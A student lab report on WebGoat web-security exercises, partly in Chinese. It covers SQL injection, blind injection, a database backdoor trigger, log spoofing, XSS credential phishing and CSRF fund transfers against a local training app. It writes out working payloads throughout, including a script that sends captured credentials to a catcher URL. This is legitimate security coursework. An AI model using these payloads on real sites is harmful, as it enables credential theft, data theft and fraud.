2018-2019-2 against network technology 20165301 Exp 9 Web security infrastructure

Basic questions answered

1.SQL injection attacks principle, how to defend?
- SQL injection is inserted into a Web form submitted by the SQL command or enter a domain name or page request query string, and ultimately deceive server to execute malicious SQL commands.
- sql injection attacks is the use refers to the use of loopholes in the design, operation Sql statement on the target server as well as other means of attack, no user input data to verify that the main reason for Sql injection attack to succeed dynamically generated Sql statement. Such as: user name, password input box, enter registration number ', -, #, and other special characters, quotation marks to achieve closure, the comment section SQL statement, using the style never really realized login information for display purposes.
- Defense: turn off or delete unnecessary interactive submit the form page;
  vulnerabilities related to the injection point code filter keyword (such as: the use of regular expressions) to standardize the code security;
  do not place the backup file on the server side to avoid being infection, or backup files contain loopholes, causing the starting point;
  the contents of the database is encrypted so that it does not have a special significance.
Principle 2.XSS attack, how to defend?
- Principle: XSS: Cross site scripting. An attacker who exploited the vulnerability site (usually these vulnerabilities that a site is not well spooler to filter user input), the input can be displayed on the page, the impact on other users of the HTML code; due to the victim's browser to the target trusted servers, when its access to the target server is inject malicious script: the page (such as html tag or javascript code) of this malicious script can be successfully implemented, achieve the purpose of obtaining the user cookie and can take advantage of user identity for illegal operations.
- defense:
  - User perspective: raise awareness, Do not enter personal information, such as user name and password;
  - Web authors point of view:
    - And URL filtering the input parameters
    - To encode the character of potential threats before the output data, escape
3.CSRF Attacks, how to defend?
- principle:
  - CSRF: Cross-site request forgery.
  - CSRF is false login. The core essence of cross-site forgery request steal user Session, or Cookie, because the current situation Session are the mainstream in the presence of Cookie attacker does not care about the victim's specific account and password, because once the user login, the user is Session the only evidence, as long as the attacker can get Session, can be disguised as the victim into the server.
  - Mainly enter a user name and password when accessing the site A, after validation, site A generates and returns a Cookie information, visit the website at this time A successful website can normally send a request to A. Before the exit site is not A, B when accessing another, Site B may return some attack code and request access to website A; thus, at the request of the site B, to the requesting site A. A Web site but do not know the request is malicious, so it will execute the malicious code
- defense:
  - Token authentication request
  - Verify Referer
  - Add plus random verification
  - Set the cookie domain

Practice record

Installation Webgoat

Download the installation package
Use netstat -tupln | grep 8080is occupied port view, if occupied, occupied with the kill process terminate process number 8080 port.
Normal installation, command-line inputjava -jar webgoat-container-7.0.1-war-exec.jar
Chrome to: localhost:8080/WebGoatthe direct use of the default user name and password to log in, start practicing

SQL injection attacks

Right-click on the page, select inspect Element review page elements to modify the source code, arbitrary code column in the check box, right-click and choose Edit At Html modify, add "& netstat -an & ipconfig"

Click the view, you can see the network port usage and the IP address of the instruction is executed. Successful attack!

Digital-type implant (Numeric SQL Injection)

Concept: injection numeric data (eg: never really formula) to achieve the effect of the injection.
Principle: injection feature characters in the station field, combined into a new SQL statement.
Such as: SELECT * FROM weather_data WHERE station = [station]
Objective: This example View all weather data via SQL injection strings.
Methods of operation:
- Right-click on the page, select inspect Element review page elements to modify the source code, add or 1 = 1 in the selected city in number Value Value
Weather conditions show all cities, the attack is successful!

Log deceive (Log Spoofing)

The concept: to deceive achieve by inserting a script in the log file.
Principle: to fool the human eye in the log file, an attacker can use this way to clear their traces in the log
Target: Record the contents of the gray area represents the log of the Web server, our aim is to use the username is "admin" user "Success Login" in the log
Methods of operation:
- Using the carriage return (0D%) and line feed (% 0A), fill in the usernamectf%0d%0aLogin Succeeded for username: admin
- An attacker could exploit this way to add malicious script to a log file, the script returns information administrators can see through the browser. For example, the admin <script>alert(document.cookie)</script>user name input, you can see the cookie information popups

SQL injection (LAB: SQL Injection)

Stage 1: the injection string (Stage 1: String SQL Injection)
Principle: bypass authentication by injecting a string

Methods of operation:

- 右键点击页面，选择inspect Element审查网页元素对源代码进行修改，将password密码框的最大长度限制改为18。

User Neville (admit) login, passwordhello' or '1' = '1

Stage 3: numeric SQL injection (Stage 3: Numeric SQL Injection)
Principle: by injecting numeric data, bypassing the authentication, by an ordinary employee accounts, view the user information of BOSS.
Methods of operation:
- User name Larry, larry click login password log on, click ViewProfile view the user information

Right-click on the page, select the page elements inspect Element review the source code, we can see that the database index is based on employee ID, presumably it returned each time to the first query data.
Explained by social engineering boss should be the highest wages, so the value of the employee ID changed to 101 or 1 = 1 order by salary desc, so that the information owner as the first query to the data.
Successful attack

String injection (String SQL Injection)

Concept: string bypass authentication by implanting
Principle: to construct your own SQL injection strings based on the following query.

SELECT * FROM user_data WHERE last_name = '?'

目标：下面的表格，允许用户查看他们的信用卡号码。尝试通过 SQL 注入将所有信用卡信息显示出来。尝试的用户名是“Smith”。
操作方法：
- 输入查询的用户名Smith' or 1=1--(Smith 和1=1都成了查询的条件，而1=1是恒等式，因此能查询到表里面的所有数据)
- 得到所有用户的信用卡号码,攻击成功!

数据库后门（Database Backdoors）

原理:数据库通常作为一个 Web 应用程序的后端来使用。此外，它也用来作为存储的媒介。它也可以被用来作为存储恶意活动的地方，如触发器。触发器是在数据库管理系统上调用另一个数据库操作，如 insert, select, update or delete。举个例子：攻击者可以创建一个触发器，该触发器在创建新用户时，将每个新用户的 Email 地址设置为攻击者的地址。
目标：利用查询的脆弱性创建触发器。由于 WebGoat 使用的是 MySQL 数据库，不支持触发器，所以该课程不会真正完成。我们的 Login ID 是 101。
操作方法：
- 输入101，得到该用户的信息。我们可以看到，输入的语句没有验证，很容易进行 SQL 注入
- 输入注入语句101; update employee set salary=18000执行两个语句
- 输入101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]'WHERE userid = NEW.userid
  - BEFORE/AFTER参数指定了触发执行的时间，在事件之前或是之后
  - FOR EACH ROW表示任何一条记录上的操作满足触发事件都会触发该触发器，也就是说触发器的触发频率是针对每一行数据触发一次

原理:某些 SQL 注入是没有明确返回信息的，只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句，构造子查询语。
目标：该题目允许输入一个帐号，并检测该帐号是否合法。使用该表单的返回信息（真或假）测试检查数据库中其它条目信息。我们找到 pins 表中 cc_number 字段值为 1111222233334444 的记录中 pin 字段的数值。pin 字段类型为 int，整型。输入找到的数值并提交，通过该题目。
操作方法：
- 本题目中，服务端页面返回的信息只有两种：帐号有效或无效。因此无法简单地查询到帐号的PIN数值。但我们可以利用系统后台在用的查询语句SELECT * FROM user_data WHERE userid=accountNumber;
- 如果该查询语句返回了帐号的信息，页面将提示帐号有效，否则提示无效。使用 AND 函数，我们可以添加一些额外的查询条件。如果该查询条件同样为真，则返回结果应提示帐号有效，否则无效。
- 例如：输入查询语句101 AND 1=1，因为两个条件都成立，所以页面返回帐号有效
- 输入查询语句101 AND 1=2，因为第二个条件不成立，所以而页面返回帐号无效
- 针对查询语句的后半部分构造复杂语句,如：101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 5000 );如果提示无效，则pin值小于5000,使用二分法，最终得出pin的值为2364

原理:与数字型盲注入类似，某些 SQL 注入是没有明确返回信息的，只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句，构造子查询语。
目标：找到 pins 表中 cc_number 字段值为 4321432143214321 的记录中 pin 字段的数值。pin 字段类型为 varchar。输入找到的数值（最终的字符串，注意拼写和大写）并提交，通过本题目。
操作方法：
- 与数字型盲注入类似，只是将注入的数字换为字符串而已
- 例如：输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'M' );取得 pin 字段数值的第一个字母，并判断其是否比字母“M”小
- SUBSTRING 语法为 SUBSTRING(STRING,START,LENGTH)
- 同样使用二分法进行测试，最后得到pin字段为Jill

XSS攻击(Cross‐Site Scripting)

跨站脚本攻击是通过HTML注入劫持用户的浏览器，任意构造用户当前浏览的HTML内容，可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击。

XSS 钓鱼（Phishing with XSS）

(1) Phishing with XSS 跨站脚本钓鱼攻击

点击Cross-Site Scripting (XSS) Phishing with XSS
利用XSS可以在已存在的页面中进一步添加元素，包括两部分：
- 受害人填写一个表格;
- 服务器以读取脚本的形式，将收集到的信息发送给攻击者。
编写一段脚本读取被攻击者在表单上输入的用户名和密码信息，将这些信息发送给捕获这些信息的 WebGoat
编写一个带用户名和密码输入框的表格

//脚本
</form>
<script>
    function hack(){ 
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    } 
</script>
<form name="phish">
<br>
<br>
//表格
<HR>
    <H2>This feature requires account login:</H2>
<br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name = "pass">
<br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

存储型XSS攻击（Stored XSS Attacks）

在title中任意输入字符，留言板中输入<script>alert("I am 20165301ctf. You've been attacked!!!");</script>

反射型XSS攻击（Reflected XSS Attacks）

输入代码<script>alert("You've been attacked!!!");</script>，点击purse的同时页面就给出了反馈

CSRF攻击

跨站请求伪造（Cross Site Request Forgery (CSRF)）

查看页面右侧Parameters中的src和menu值，分别为267和900
在title中输入任何参数，message框中输入<img src="http://localhost:8080/WebGoat/attack?Screen=267&menu=900&transferFunds=5000" width="1" height="1" />,以图片的的形式将URL放进Message框，这时的URL对其他用户是不可见的(宽高设置成1像素的目的是隐藏该图片)，用户一旦点击图片，就会触发一个CSRF事件，点击Submit提交
在Message List中生成以Title命名的消息。点击该消息，当前页面就会下载这个消息并显示出来，转走用户的5000元，从而达到CSRF攻击的目的。可以从左侧的任务栏看到任务已完成。

绕过 CSRF 确认（ CSRF Prompt By‐Pass）

查看页面右侧Parameters中的src和menu值分别为270和900
并在title框中输入学号，message框中输入代码：

<iframe src="attack?Screen=270&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=270&menu=900&transferFunds=CONFIRM"> </iframe>

在Message List中生成以Title命名的链接，点击进入后，攻击成功,可以从左侧的任务栏看到任务已完成。

实验总结与体会

实验内容好多啊。。。webgoat真厉害

2018-2019-2 against network technology 20165301 Exp 9 Web security infrastructure

2018-2019-2 against network technology 20165301 Exp 9 Web security infrastructure

Basic questions answered

Practice record

Installation Webgoat

SQL injection attacks

Digital-type implant (Numeric SQL Injection)

Log deceive (Log Spoofing)

SQL injection (LAB: SQL Injection)

String injection (String SQL Injection)

数据库后门（Database Backdoors）

数字型盲注入（Blind Numeric SQL Injection）

字符串型盲注入（Blind String SQL Injection）

XSS攻击(Cross‐Site Scripting)

XSS 钓鱼（Phishing with XSS）

(1) Phishing with XSS 跨站脚本钓鱼攻击

存储型XSS攻击（Stored XSS Attacks）

反射型XSS攻击（Reflected XSS Attacks）

CSRF攻击

跨站请求伪造（Cross Site Request Forgery (CSRF)）

绕过 CSRF 确认（ CSRF Prompt By‐Pass）

实验总结与体会

Guess you like